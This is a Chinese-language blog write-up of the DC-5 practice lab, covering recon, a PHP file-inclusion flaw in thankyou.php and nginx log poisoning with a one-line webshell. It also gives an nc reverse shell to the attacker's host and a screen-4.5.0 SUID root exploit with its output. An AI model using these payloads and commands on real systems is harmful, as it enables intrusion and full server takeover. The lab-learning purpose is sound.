DC系列靶场---DC 5靶场的渗透测试

DC-5渗透测试

信息收集

地址探测

使用arp-scan对目标主机进行地址探测

arp-scan -l -I eth0

目标主机IP地址为172.30.1.132

Nmap扫描

使用Nmap对目标主机进行端口扫描

nmap -sS -sV -T4 -p- -O 172.30.1.132

//-sS  Nmap默认扫描类型,SYS的秘密扫描

//-sV  服务版本检测

//-T4  野蛮扫描(常用)

//-p-  对所有端口进行扫描

//-O   识别操作系统类型 (大O)

目标主机只开放了80端口,所以我们突破点就在80。

目录枚举

使用dirbuster进行目录枚举,dirbuster中自带有字典

扫描二维码关注公众号,回复: 17521026 查看本文章

选择Results-Tree Vlew模块可以到网站目录的架构

这里看到一个footer.php,这是一个网站页脚的程序文件。

还看到contact.php,这个是网站的留言板,也就是网站交互式的地方。

HTTP探测

在访问目标主机的网站没有思路时,可以看一下网站的架构

随便编写提交看一下有什么不一样的地方。

提交后重定向到thankyou.php的文件中,随着不断刷新,看到页脚的版本在发生改变,这个就是文件包含漏洞啦

直接访问thankyou.php的效果也是一样的,也就是thinkyou.php调用了footer.php

形式为:http;//172.30.1.132/thanyou.php?file=footer.php

我们可以验证下一是否存在文件包含漏洞呢?

看到是可以看到目标主机的账户文件的。

漏洞查找及利用

文件包含

文件包含漏洞:

文件包含漏洞通常出现在编写糟糕的PHP web应用程序中,其中输入参数没有得到正确的处理或验证。

因此,攻击者很容易捕获传递的HTTP请求,操纵URL参数,该参数接受文件名并将恶意文件包含在web服务器中。

原理:

服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件(参数),另外一个文件中的PHP代码就会被执行,

这是在Web开发时,代码常用的一种处理方法。

利用日志GET到SHELL

对根目录的请求包写入一句话木马,看到响应码是400,不用管

<?php system(&_GET['cmd']) ;?>

DC-5使用的是nginx,默认日志路径/var/log/nginx/access/log

写入后访问是可以看到的,如果看不到就是访问次数过多,日志文件可能满了。

我们可以通过&进行传参到CMD执行系统命令。

查看目标主机是否有nc,看到这里是有的。

/thankyou.php?file=/var/log/nginx/access.log&cmd=which nc

获取shell

使用nc获取shell

Kali主机做侦听

nc -lnvp 4444

目标主机主动连接kali

/thankyou.php?file=/var/log/nginx/access.log&cmd=nc -nv 172.30.1.20 4444 -c /bin/bash

提权

信息收集

查看系统账户文件

cat /etc/passwd

没有什么有用的信息

查看SUID权限的文件

find / -perm -4000 -type f 2>/dev/null

这里有一个/bin/screen-4.5.0的文件。

使用searchsploit搜索提权漏洞

searchsploit screen 4.5.0

提权

将漏洞文件镜像到本地主机

searchsploit -m 41154

dos2unix命令用来将DOS格式的文本文件转换成UNIX格式的(DOS/MAC to UNIX text file format converter)。DOS下的文本文件是以\r\n作为断行标志的,表示成十六进制就是0D 0A。而Unix下的文本文件是以\n作为断行标志的,表示成十六进制就是0A。DOS格式的文本文件在Linux底下,用较低版本的vi打开时行尾会显示^M,而且很多命令都无法很好的处理这种格式的文件,如果是个shell脚本,。而Unix格式的文本文件在Windows下用Notepad打开时会拼在一起显示。因此产生了两种格式文件相互转换的需求,对应的将UNIX格式文本文件转成成DOS格式的是unix2dos命令。

run.sh格式转换,每个操作系统以字符表示结尾的时候是不同的,查看脚本文件若每行结尾为 ^M

则需要使用命令 dos2unix run.sh 将其转换一下

提权参考

cp 41154.sh run.sh

dos2unix run.sh

使用python搭建一个简易Web服务器

python -m http.server 5555

使用wget下载脚本文件

wget -c 172.30.1.20:5555/run.sh

给该脚本添加执行权

chmod 777 run.sh

运行脚本

www-data@dc-5:/tmp$ ./run.sh
./run.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.


获取flag

总结

1、DC-5是存在文件包含漏洞,通常出现在PHP Web应用程序中。

2、文件包含漏洞存在的原因,输入参数没有得到正确的处理或验证。

3、文件包含漏洞的原理,服务器执行PHP文件时,可以通过文件包含函数加载另外一个文件        (参数),另外一个文件中的PHP代码就会被执行。

4、通过文件包含漏洞可以查看Linux系统的敏感文件

5、文件包含分为两类:

本地文件包含(Local File Inclusion,LFI)当被包含的文件在服务器本地时,就形成本地文件包含


远程文件包含(Remote File Inclusion,RFI)当被包含的文件在第三方服务器时,叫做远程文件包含(前提:开启了PHP配置中的allow_url_fopen选项)

6、Nginx默认日志文件/var/log/nginx/access.log

7、文件包含漏洞:通过GET请求写入一句话木马 通过日志获取shell                                                查看系统SUID的权限,获得提权

8、PHP中文件包含函数有以下四种:

    require()

    require_once()

    include()

    include_once()

猜你喜欢

转载自blog.csdn.net/zhouA0221/article/details/140938335